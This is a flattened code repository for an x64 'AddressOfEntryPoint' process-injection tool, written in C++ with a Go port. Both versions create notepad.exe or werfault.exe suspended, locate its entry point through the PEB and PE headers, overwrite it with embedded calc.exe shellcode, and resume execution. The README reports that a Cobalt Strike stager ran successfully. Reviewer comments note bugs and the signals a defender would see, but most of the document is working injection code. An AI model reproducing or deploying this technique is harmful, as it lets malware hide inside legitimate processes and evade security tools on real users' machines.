├── README.md ├── entrypoint.cpp ├── entrypoint.sln ├── entrypoint.vcxproj ├── entrypoint.vcxproj.filters ├── entrypoint.vcxproj.user └── golang ├── AddressOfEntryPoint.go ├── go.mod └── go.sum /README.md: -------------------------------------------------------------------------------- 1 | # AddressOfEntryPoint-injection 2 | x64 version of https://www.ired.team/offensive-security/code-injection-process-injection/addressofentrypoint-code-injection-without-virtualallocex-rwx 3 | 4 | Pop calc.exe success 5 | 6 | Cobalt Strike Stager execute Success 7 | -------------------------------------------------------------------------------- /entrypoint.cpp: --------------------------------------------------------------------------------
// NOTE(review): the header names after the three #include directives are
// missing from this listing (presumably lost when the page was extracted).
#include
#include
#include
#pragma comment(lib, "ntdll")

using namespace std;

// main starts notepad.exe suspended, reads the child's PEB and PE headers to
// find the image entry point, overwrites the bytes at that address with
// `shellcode`, and resumes the child's main thread.
//
// Review notes:
//  - No return value is checked (CreateProcessA, NtQueryInformationProcess,
//    ReadProcessMemory, WriteProcessMemory, ResumeThread), so a failed step
//    is not noticed and the following steps run on zeroed data.
//  - pi.hProcess and pi.hThread are never closed.
//  - Defender view: the observable sequence is a child created with
//    CREATE_SUSPENDED, cross-process reads of the PEB and image headers, a
//    cross-process write into the child's own image at its entry point, and
//    then a thread resume. After the write the entry-point bytes in memory
//    no longer match the file on disk.
int main()
{
	//x64 calc.exe
	// sizeof(shellcode) below includes the string literal's terminating NUL.
	unsigned char shellcode[] ="\x31\xc0\x50\x68\x63\x61\x6c\x63\x54\x59\x50\x40\x92\x74\x15\x51\x64\x8b\x72\x2f\x8b\x76\x0c\x8b\x76\x0c\xad\x8b\x30\x8b\x7e\x18\xb2\x50\xeb\x1a\xb2\x60\x48\x29\xd4\x65\x48\x8b\x32\x48\x8b\x76\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\x03\x57\x3c\x8b\x5c\x17\x28\x8b\x74\x1f\x20\x48\x01\xfe\x8b\x54\x1f\x24\x0f\xb7\x2c\x17\x8d\x52\x02\xad\x81\x3c\x07\x57\x69\x6e\x45\x75\xef\x8b\x74\x1f\x1c\x48\x01\xfe\x8b\x34\xae\x48\x01\xf7\x99\xff\xd7";

	STARTUPINFOA si;
	si = {};
	PROCESS_INFORMATION pi = {};
	PROCESS_BASIC_INFORMATION pbi = {};
	DWORD returnLength = 0;
	// The child is created suspended, so none of its code has run yet when
	// the steps below execute.
	CreateProcessA(0, (LPSTR)"c:\\windows\\system32\\notepad.exe", 0, 0, 0, CREATE_SUSPENDED, 0, 0, &si, &pi);

	// get target image PEB address and pointer to image base
	NtQueryInformationProcess(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(PROCESS_BASIC_INFORMATION), &returnLength);

	//x86:DWORD pebOffset = (DWORD)pbi.PebBaseAddress + 8;
	// Address of the image-base field inside the child's PEB (offset 0x10 in
	// this x64 build; the x86 line above uses 8).
	DWORD_PTR pebOffset = (DWORD_PTR)pbi.PebBaseAddress + 0x10;

	// get target process image base address
	LPVOID imageBase = 0;
	//x86:ReadProcessMemory(pi.hProcess, (LPCVOID)pebOffset, &imageBase, 4, NULL);
	ReadProcessMemory(pi.hProcess, (LPCVOID)pebOffset, &imageBase, sizeof(LPVOID), NULL);;

	// read target process image headers
	// Only the first 4096 bytes of the image are copied into this process.
	BYTE headersBuffer[4096] = {};
	ReadProcessMemory(pi.hProcess, (LPCVOID)imageBase, headersBuffer, 4096, NULL);

	// get AddressOfEntryPoint
	PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)headersBuffer;
	//x86:PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)headersBuffer + dosHeader->e_lfanew);
	// e_lfanew comes from the child's memory and is not checked against the
	// 4096-byte buffer before it is used as an offset.
	PIMAGE_NT_HEADERS64 ntHeader = (PIMAGE_NT_HEADERS64)((DWORD_PTR)headersBuffer + dosHeader->e_lfanew);
	// AddressOfEntryPoint is relative to the image base, so the base read
	// from the PEB is added to get the address inside the child.
	LPVOID codeEntry = (LPVOID)(ntHeader->OptionalHeader.AddressOfEntryPoint + (DWORD_PTR)imageBase);

	// Do something with the AddressOfEntryPoint(print to console in this case)
	cout << codeEntry << endl;

	// write shellcode to image entry point and execute it
	// No protection change is made before this write, unlike the Go port in
	// golang/AddressOfEntryPoint.go, which brackets its write with two
	// NtProtectVirtualMemory calls.
	WriteProcessMemory(pi.hProcess, codeEntry, shellcode, sizeof(shellcode), NULL);
	ResumeThread(pi.hThread);

	return 0;
}
-------------------------------------------------------------------------------- /entrypoint.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31410.357 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "entrypoint", "entrypoint.vcxproj", "{518CBE60-699A-4E3C-8EAB-3E7D3B698961}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {518CBE60-699A-4E3C-8EAB-3E7D3B698961}.Debug|x64.ActiveCfg = 
Debug|x64 17 | {518CBE60-699A-4E3C-8EAB-3E7D3B698961}.Debug|x64.Build.0 = Debug|x64 18 | {518CBE60-699A-4E3C-8EAB-3E7D3B698961}.Debug|x86.ActiveCfg = Debug|Win32 19 | {518CBE60-699A-4E3C-8EAB-3E7D3B698961}.Debug|x86.Build.0 = Debug|Win32 20 | {518CBE60-699A-4E3C-8EAB-3E7D3B698961}.Release|x64.ActiveCfg = Release|x64 21 | {518CBE60-699A-4E3C-8EAB-3E7D3B698961}.Release|x64.Build.0 = Release|x64 22 | {518CBE60-699A-4E3C-8EAB-3E7D3B698961}.Release|x86.ActiveCfg = Release|Win32 23 | {518CBE60-699A-4E3C-8EAB-3E7D3B698961}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {326960E6-C8C3-42D1-9F5C-FB0B8E2B548C} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /entrypoint.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {518cbe60-699a-4e3c-8eab-3e7d3b698961} 25 | entrypoint 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | 
true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | 120 | 121 | Console 122 | true 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | true 130 | true 131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 132 | true 133 | 134 | 135 | Console 136 | true 137 | true 138 | true 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | -------------------------------------------------------------------------------- /entrypoint.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | -------------------------------------------------------------------------------- /entrypoint.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /golang/AddressOfEntryPoint.go: --------------------------------------------------------------------------------
package main

import (
	"debug/pe"
	"encoding/binary"
	"fmt"
	"golang.org/x/sys/windows"
	"os"
	"strconv"
	"syscall"
	"unsafe"
)

//IMAGE_NT_HEADERS64 type
// IMAGE_NT_HEADERS64 is overlaid in main on the header bytes copied from the
// child process: a 32-bit signature, the COFF file header and the 64-bit
// optional header, the last two taken from debug/pe.
// NOTE(review): the overlay assumes Go lays this struct out exactly like the
// on-disk headers - confirm.
type IMAGE_NT_HEADERS64 struct {
	Signature      uint32
	FileHeader     pe.FileHeader
	OptionalHeader pe.OptionalHeader64
}

// ImageDosHeader holds the fields that Parse decodes from the first 64 bytes
// of a PE image. E_res and E_res2 are slices that Parse fills by appending
// (4 and 10 values respectively). Eminalloc and Eip are spelled without the
// underscore the other fields carry.
type ImageDosHeader struct {
	E_magic    uint16
	E_cblp     uint16
	E_cp       uint16
	E_crlc     uint16
	E_cparhdr  uint16
	Eminalloc  uint16
	E_maxalloc uint16
	E_ss       uint16
	E_sp       uint16
	E_csum     uint16
	Eip        uint16
	E_cs       uint16
	E_lfarlc   uint16
	E_ovno     uint16
	E_res      []uint16
	E_oemid    uint16
	E_oeminfo  uint16
	E_res2     []uint16
	E_lfanew   uint32 // used in main as the offset from the image start to the NT headers
}

// PImageDosHeader is a named pointer type for *ImageDosHeader, matching the
// PIMAGE_DOS_HEADER name used in the C++ version.
type PImageDosHeader *ImageDosHeader

// NewImageDosHeader allocates an ImageDosHeader and fills it from data using
// Parse. No length check is made here or in Parse, so data must hold at
// least 64 bytes.
func NewImageDosHeader(data []byte) *ImageDosHeader {
	image_dos_header := new(ImageDosHeader)
	image_dos_header.Parse(data)
	return image_dos_header
}

// Parse decodes the little-endian DOS header fields from data[0:64] into h.
//
// Review notes: nothing validates len(data) before slicing, E_magic is
// stored without being compared to any expected value, and E_res / E_res2
// are appended to rather than reset, so calling Parse twice on the same
// header leaves them with twice as many entries.
func (h *ImageDosHeader) Parse(data []byte) {
	h.E_magic = binary.LittleEndian.Uint16(data[0:2])
	h.E_cblp = binary.LittleEndian.Uint16(data[2:4])
	h.E_cp = binary.LittleEndian.Uint16(data[4:6])
	h.E_crlc = binary.LittleEndian.Uint16(data[6:8])
	h.E_cparhdr = binary.LittleEndian.Uint16(data[8:10])
	h.Eminalloc = binary.LittleEndian.Uint16(data[10:12])
	h.E_maxalloc = binary.LittleEndian.Uint16(data[12:14])
	h.E_ss = binary.LittleEndian.Uint16(data[14:16])
	h.E_sp = binary.LittleEndian.Uint16(data[16:18])
	h.E_csum = binary.LittleEndian.Uint16(data[18:20])
	h.Eip = binary.LittleEndian.Uint16(data[20:22])
	h.E_cs = binary.LittleEndian.Uint16(data[22:24])
	h.E_lfarlc = binary.LittleEndian.Uint16(data[24:26])
	h.E_ovno = binary.LittleEndian.Uint16(data[26:28])
	// Four 16-bit reserved words at offsets 28..35.
	for i := 0; i < 8; i+=2 {
		h.E_res = append(
			h.E_res,
			binary.LittleEndian.Uint16(data[28+i:30+i]),
		)
	}

	h.E_oemid = binary.LittleEndian.Uint16(data[36:38])
	h.E_oeminfo = binary.LittleEndian.Uint16(data[38:40])
	// Ten 16-bit reserved words at offsets 40..59.
	for i := 0; i < 20; i+=2 {
		h.E_res2 = append(
			h.E_res2,
			binary.LittleEndian.Uint16(data[40+i:42+i]),
		)
	}
	h.E_lfanew = binary.LittleEndian.Uint32(data[60:64])
}

// shellcode is the byte sequence main writes at the child's entry point.
// Per the comment below it is the calc.exe payload from the linked project;
// the same bytes appear as a string literal in entrypoint.cpp.
var shellcode = []byte{
	//calc.exe https://github.com/peterferrie/win-exec-calc-shellcode
	0x31, 0xc0, 0x50, 0x68, 0x63, 0x61, 0x6c, 0x63,
	0x54, 0x59, 0x50, 0x40, 0x92, 0x74, 0x15, 0x51,
	0x64, 0x8b, 0x72, 0x2f, 0x8b, 0x76, 0x0c, 0x8b,
	0x76, 0x0c, 0xad, 0x8b, 0x30, 0x8b, 0x7e, 0x18,
	0xb2, 0x50, 0xeb, 0x1a, 0xb2, 0x60, 0x48, 0x29,
	0xd4, 0x65, 0x48, 0x8b, 0x32, 0x48, 0x8b, 0x76,
	0x18, 0x48, 0x8b, 0x76, 0x10, 0x48, 0xad, 0x48,
	0x8b, 0x30, 0x48, 0x8b, 0x7e, 0x30, 0x03, 0x57,
	0x3c, 0x8b, 0x5c, 0x17, 0x28, 0x8b, 0x74, 0x1f,
	0x20, 0x48, 0x01, 0xfe, 0x8b, 0x54, 0x1f, 0x24,
	0x0f, 0xb7, 0x2c, 0x17, 0x8d, 0x52, 0x02, 0xad,
	0x81, 0x3c, 0x07, 0x57, 0x69, 0x6e, 0x45, 0x75,
	0xef, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x01, 0xfe,
	0x8b, 0x34, 0xae, 0x48, 0x01, 0xf7, 0x99, 0xff,
	0xd7,
}

// main is the Go port of entrypoint.cpp: it starts a suspended child
// process, reads the child's PEB and PE headers to locate the image entry
// point, overwrites the bytes there with the package-level shellcode, and
// resumes the child's main thread.
//
// Review notes:
//   - Every result of CreateProcess, NtQueryInformationProcess,
//     ReadProcessMemory, NtProtect, NtWriteVirtualMemory and ResumeThread is
//     discarded, so a failed step goes unnoticed and later steps run on zero
//     values.
//   - pi.Process and pi.Thread are never closed.
//   - Defender view: the observable sequence is a child created with
//     CREATE_SUSPENDED, cross-process reads of the PEB and image headers, a
//     protection change on the page holding the image entry point, a
//     cross-process write into that image-backed page, a second protection
//     change, and a thread resume. After the write the entry-point bytes in
//     memory no longer match the file on disk.
func main(){
	// The child is werfault.exe started with "-u -p <this process's PID>";
	// the C++ version starts notepad.exe instead.
	cmdline := "c:\\windows\\system32\\werfault.exe -u -p " + strconv.Itoa(os.Getpid())
	fmt.Println(cmdline)
	cmd := syscall.StringToUTF16Ptr(cmdline)
	var si windows.StartupInfo
	var pi windows.ProcessInformation

	// info stays at its zero value and is passed as the information class;
	// 0 is ProcessBasicInformation, the class the C++ version names.
	var info int32
	var pbi windows.PROCESS_BASIC_INFORMATION
	var returnLen uint32 = 0
	var SizeOfProcessBasicInformationStruct = unsafe.Sizeof(windows.PROCESS_BASIC_INFORMATION{})

	// Created suspended: none of the child's code has run when the steps
	// below execute.
	windows.CreateProcess(nil,cmd,nil,nil,false,windows.CREATE_SUSPENDED,nil,nil,&si,&pi)

	windows.NtQueryInformationProcess(pi.Process,info,unsafe.Pointer(&pbi),uint32(SizeOfProcessBasicInformationStruct),&returnLen)

	// Address of the image-base field inside the child's PEB (offset 0x10,
	// as in the x64 C++ version).
	pebOffset:= uintptr(unsafe.Pointer(pbi.PebBaseAddress))+0x10

	var imageBase uintptr = 0
	k32 := syscall.NewLazyDLL("kernel32")
	ReadProcessMemory := k32.NewProc("ReadProcessMemory")

	// Read 8 bytes (one 64-bit pointer) from the child: its image base.
	ReadProcessMemory.Call(uintptr(pi.Process),pebOffset, uintptr(unsafe.Pointer(&imageBase)),8,0)

	headersBuffer := make([]byte,4096)

	// Copy the first 4096 bytes of the child's image into headersBuffer.
	ReadProcessMemory.Call(uintptr(pi.Process),imageBase,uintptr(unsafe.Pointer(&headersBuffer[0])),4096,0)

	h1:= fmt.Sprintf("0x%x", imageBase)
	fmt.Println("imageBase:",h1)
	h2:= fmt.Sprintf("0x%x", pebOffset)
	fmt.Println("pebOffset:",h2)
	h3:= fmt.Sprintf("0x%x", uintptr(unsafe.Pointer(&headersBuffer[0])))
	fmt.Println("headersBuffer:",h3)

	// get AddressOfEntryPoint
	//PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)headersBuffer;
	var dos_header PImageDosHeader
	dos_header = NewImageDosHeader(headersBuffer)

	//PIMAGE_NT_HEADERS64 ntHeader = (PIMAGE_NT_HEADERS64)((DWORD_PTR)headersBuffer + dosHeader->e_lfanew);
	// NOTE(review): E_lfanew was read from the child's memory and is not
	// checked against the 4096-byte buffer, so the overlay below can point
	// outside headersBuffer. The address is also held in a uintptr variable
	// and converted back to unsafe.Pointer in a later statement, which is
	// not one of the conversion patterns package unsafe documents as valid.
	nt_Header := uintptr(unsafe.Pointer(&headersBuffer[0])) + uintptr(dos_header.E_lfanew)
	ntHeader := (*IMAGE_NT_HEADERS64)(unsafe.Pointer(nt_Header))
	//LPVOID codeEntry = (LPVOID)(ntHeader->OptionalHeader.AddressOfEntryPoint + (DWORD_PTR)imageBase);
	// AddressOfEntryPoint is relative to the image base, so the base read
	// from the PEB is added to get the address inside the child.
	codeEntry := uintptr(ntHeader.OptionalHeader.AddressOfEntryPoint)+imageBase

	h:= fmt.Sprintf("0x%x", codeEntry)
	fmt.Println("AddressOfEntryPoint:",h)

	//WriteProcessMemory := k32.NewProc("WriteProcessMemory")
	//WriteProcessMemory.Call(uintptr(pi.Process), codeEntry, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)),0)

	// The two ntdll exports are resolved by name at run time through
	// separate LazyDLL values.
	NTWVM := syscall.NewLazyDLL("ntdll").NewProc("NtWriteVirtualMemory")
	NtProtectVirtualMemory := syscall.NewLazyDLL("ntdll").NewProc("NtProtectVirtualMemory")

	// Switch the entry-point region to PAGE_READWRITE; the previous
	// protection is stored in old.
	var old uintptr
	NtProtect(NtProtectVirtualMemory,uintptr(pi.Process),codeEntry,uintptr(len(shellcode)),syscall.PAGE_READWRITE,&old)

	// Write the shellcode bytes over the child's entry point.
	NTWVM.Call(uintptr(pi.Process),codeEntry,uintptr(unsafe.Pointer(&shellcode[0])),uintptr(len(shellcode)),0)

	// Put back the protection saved in old; old is passed both as the new
	// protection and as the destination for the previous one.
	NtProtect(NtProtectVirtualMemory,uintptr(pi.Process),codeEntry,uintptr(len(shellcode)),old,&old)

	windows.ResumeThread(pi.Thread)

}

// NtProtect calls the supplied NtProtectVirtualMemory procedure for the
// process handle pHndl, asking for protection `protect` on the region
// described by targetPtr and sSize, and returns the three results of
// LazyProc.Call unchanged.
//
// The procedure is given the addresses of this function's own copies of
// targetPtr and sSize, so anything it writes back to them is discarded when
// the function returns. The previous protection is written through
// oldProtect.
// NOTE(review): r1 is presumably the NTSTATUS; both callers in main ignore
// it - confirm and check it.
func NtProtect(NtProtectVirtualMemory *syscall.LazyProc,pHndl uintptr,targetPtr uintptr, sSize uintptr,protect uintptr,oldProtect *uintptr)(uintptr,uintptr,error){
	r1,r2,lastErr := NtProtectVirtualMemory.Call(
		pHndl,
		// The inner (*uintptr) conversion is redundant; the value passed is
		// the address of targetPtr.
		uintptr(unsafe.Pointer((*uintptr)(unsafe.Pointer(&targetPtr)))),
		uintptr((unsafe.Pointer(&sSize))),
		protect,
		uintptr((unsafe.Pointer(oldProtect))),
	)
	return r1,r2,lastErr
}

-------------------------------------------------------------------------------- /golang/go.mod: -------------------------------------------------------------------------------- 1 | module entrypoint 2 | 3 | go 1.16 4 | 5 | require ( 6 | github.com/soyum2222/editPE v0.0.0-20210624070249-c6fb60af2160 7 | golang.org/x/sys v0.0.0-20210906170528-6f6e22806c34 8 | ) 9 | -------------------------------------------------------------------------------- /golang/go.sum: -------------------------------------------------------------------------------- 1 | github.com/soyum2222/editPE v0.0.0-20210624070249-c6fb60af2160 h1:4qLL5A+f9VE4R7H5viRlBI/ax/oxkLsphN2grtAaLFY= 2 | github.com/soyum2222/editPE v0.0.0-20210624070249-c6fb60af2160/go.mod h1:++uT61R9lWv7RD8YmtMk76ck2N9FYhRkgah3bmHkSBU= 3 | golang.org/x/sys v0.0.0-20210906170528-6f6e22806c34 h1:GkvMjFtXUmahfDtashnc1mnrCtuBVcwse5QV2lUk/tI= 4 | golang.org/x/sys v0.0.0-20210906170528-6f6e22806c34/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 5 | --------------------------------------------------------------------------------